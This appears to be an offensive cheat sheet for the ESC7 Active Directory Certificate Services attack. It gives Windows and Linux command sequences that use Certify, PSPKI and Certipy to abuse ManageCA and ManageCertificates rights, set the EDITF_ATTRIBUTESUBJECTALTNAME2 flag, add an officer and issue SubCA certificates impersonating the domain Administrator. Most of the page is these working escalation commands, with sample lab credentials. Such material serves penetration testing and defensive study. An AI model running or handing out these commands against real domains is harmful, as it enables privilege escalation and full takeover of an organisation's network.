ESC7
Vulnerable Certificate Authority Access Control
where 2 sets of permissions poses security risks:
- ManageCA (or
ManageCertificates
) - ManageCertificates (or
Certificate Manager
)
Enumerate using certsrv.msc
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.local | Get-CertificationAuthorityAcl | select -expand Access
Query CA with certutil (EditFlags
value)
Check if EDITF_ATTRIBUTESUBJECTALTNAME2
is set if the value is 1376590
.
PS /home/bobbuilder> certutil.exe -config "LAB-DC.lab.local\lab-LAB-DC-CA" -getreg "policy\EditFlags"
Enumerate using PSPKI
module
PS /home/bobbuilder> Import-Module .\PSPKI.ps1
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName LAB-DC.lab.local | Get-CertificationAuthorityAcl | select -ExpandProperty access
Windows
Attack 1 (Allow SAN by flipping EDITF_ATTRIBUTESUBJECTALTNAME2
)
Templates with ManageCA enables the principal to manipulate settings remotely using PSPKI by toggling the EDITF_ATTRIBUTESUBJECTALTNAME2
flag (just like with ESC6). This allows SAN specification in any template. The ESC6 attack got patch on May of 2022, so Attack #2 might be a better alternative if it's the case.
Note: this will not have any effect until the CA service (CertSvc) is restarted which ManageCA
users have but they can't do it remotely.
- Request Certificate Template
PS /home/bobbuilder> certify.exe request /ca:<ca> /template:ApprovalNeeded
- Import
PSPKI
module
Import-Module PSPKI
- Approve Pending Request
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.local | Get-PendingRequest -RequestID 336 | Approve-CertificateRequest
- Download Pending Request
PS /home/bobbuilder> certify.exe download /ca:<ca> /id:336
Post Attack
Disable EDITF_ATTRIBUTESUBJECTALTNAME2
with PowerShell
$ConfigReader.SetConfigEntry(1114446,"EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy") $ConfigReader.GetConfigEntry("EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
Attack 2 (gain ManageCertificates
right using ManageCA
)
For this attack we only need ManageCA
permission. We will need Manage Certificates
permission and SubCA
Certificate template enabled but they both can be enabled from ManageCA
- Grant
Manage Certificates
access (Optional, if we don't already)
certipy ca -ca 'corp-DC-CA' -add-officer john -username john@corp.local -password Passw0rd
- Enable
SubCA
Certificate template (Optional, The SubCA template is enabled by default)
certipy ca -username john@corp.local -password Passw0rd! -target-ip ca.corp.local -ca 'corp-CA' -enable-template 'SubCA'
- Request certificate based on the
SubCA
template
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template SubCA -upn administrator@corp.local
- Issue the failed certificate
certipy ca -ca 'corp-DC-CA' -issue-request 785 -username john@corp.local -password Passw0rd
- Retrieve the issued certificate
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -retrieve 785
Linux
Attack 1 (ManageCA
rights)
- Add Manage Certificates Access rights to BlWasp
certipy ca -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -add-officer BlWasp
- Requesting a certificate with SAN (
Enrollee Supplies Subject : True
)
certipy req -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -template SubCA -upn Administrator
- Issue the certificate
certipy ca -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -issue-request 31
- Retrieve the certificate with the ID to authenticate using it
certipy req -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -retrieve 31
Attack 2 (ManageCertificates
rights)
- Request a certificate with the manager's approval
certipy req -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -template ESC7_1 -upn Administrator
- Approve pending request
certipy ca -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -issue-request 59
- Retrieve approved request
certipy req -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -retrieve 59